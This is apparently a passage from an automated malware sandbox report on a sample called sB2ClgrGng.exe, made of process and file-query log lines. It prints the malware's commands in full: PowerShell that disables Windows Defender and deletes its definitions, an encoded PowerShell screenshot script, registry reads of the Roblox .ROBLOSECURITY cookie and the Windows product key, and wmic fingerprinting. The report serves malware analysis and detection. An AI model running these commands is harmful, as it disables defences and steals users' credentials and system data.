AAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.cmdline"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESADCB.tmp" "c:\Users\user\AppData\Local\Temp\tuy1nspn\CSC4CC439E8542640B1AC30792EC9E3F11A.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip" *
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab

Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe

Code function: 84_2_00007FF71F0DB340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

84_2_00007FF71F0DB340

Source: C:\Users\user\Desktop\sB2ClgrGng.exe

Code function: 0_2_00007FF644899570 cpuid

0_2_00007FF644899570

Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\Desktop\sB2ClgrGng.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI58162\base_library.zip VolumeInformation	Jump to behavior
